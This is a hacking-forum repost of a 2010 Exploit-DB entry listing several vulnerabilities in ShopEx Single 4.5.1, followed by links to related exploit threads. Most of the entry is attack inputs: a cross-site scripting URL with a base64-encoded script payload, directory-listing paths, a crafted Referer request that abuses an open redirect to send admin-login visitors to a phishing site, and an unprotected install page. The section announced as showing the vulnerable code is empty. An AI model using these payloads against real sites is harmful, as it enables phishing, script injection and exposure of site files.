Exploit ShopEx Single 4.5.1 - Multiple Vulnerabilities

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
11341
Проверка EDB
  1. Пройдено
Автор
CP77FK4R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-02-06
Код: 
# Exploit Title: ShopEx <= Single V4.5.1 Multiple Vulnerabilities
# Date: 30/01/10
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com| www.DigitalWhisper.co.il
# Software Link: http://www.shopex.cn | http://www.shopex.cn/download/
# Version: <= Single V4.5.1
# Tested on: PHP
#
##[Cross Site Scripting]
(Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it)
http://server/?gOo=ZXJyb3IuZHd0&errinfo=PHNjcmlwdD5hbGVydCgiWFNTRUQiKTwvc2NyaXB0Pg==
#
#
##[Directory Listing]
http://server/syssite/home/
http://server/icons/
http://server/syssite/dfiles
http://server/templates/
http://server/syssite/shopadmin/images/
http://server/syssite/shopadmin/user_guide/
#
#
##[Open Redirection:]
(OWASP: An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.)
The admin login page (http://server/syssite/shopadmin/login.php) redirect the none-authentication users
the the "document.referrer" page. The attacker can exploit the mechanism to trick the victim like that:
#
#
HTTP REQUEST:
GET /syssite/shopadmin/login.php HTTP/1.1
Host: [SERVER]
Referer: http://www.PHISHING.com
#
the user will be sent to the original page but will be redirected to the PHISHING site.
#
the vulnerable code is: (in: http://server/syssite/shopadmin/login.php)
#

#
#
##[Unprotected Install Proccess:]
http://server/syssite/install/home.htm
#
[e0f]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit ShopEx Single 4.5.1 - 'errinfo' Cross-Site Scripting
Ответы
0
Просмотры
413
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Single Theater Booking Script 3.2.1 - 'findcity.php?q' SQL Injection
Ответы
0
Просмотры
709
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit nt!_SEP_TOKEN_PRIVILEGES - Single Write EoP Protect
Ответы
0
Просмотры
648
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin Single Personal Message 1.0.3 - SQL Injection
Ответы
0
Просмотры
641
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit RedHat Linux 6.0 - Single User Mode Authentication
Ответы
0
Просмотры
496
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MySQL 5.0.x - Single Row SubSelect Remote Denial of Service
Ответы
0
Просмотры
462
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Fortinet Single Sign On - Stack Overflow
Ответы
0
Просмотры
404
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Opera 7.0/7.10 - JavaScript Console Single Quote Attribute Injection
Ответы
0
Просмотры
385
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit ATP HTTPd 0.4 - Single Byte Buffer Overflow
Ответы
0
Просмотры
352
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Xerver 4.17 - Single Dot File Request Source Disclosure
Ответы
0
Просмотры
339
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу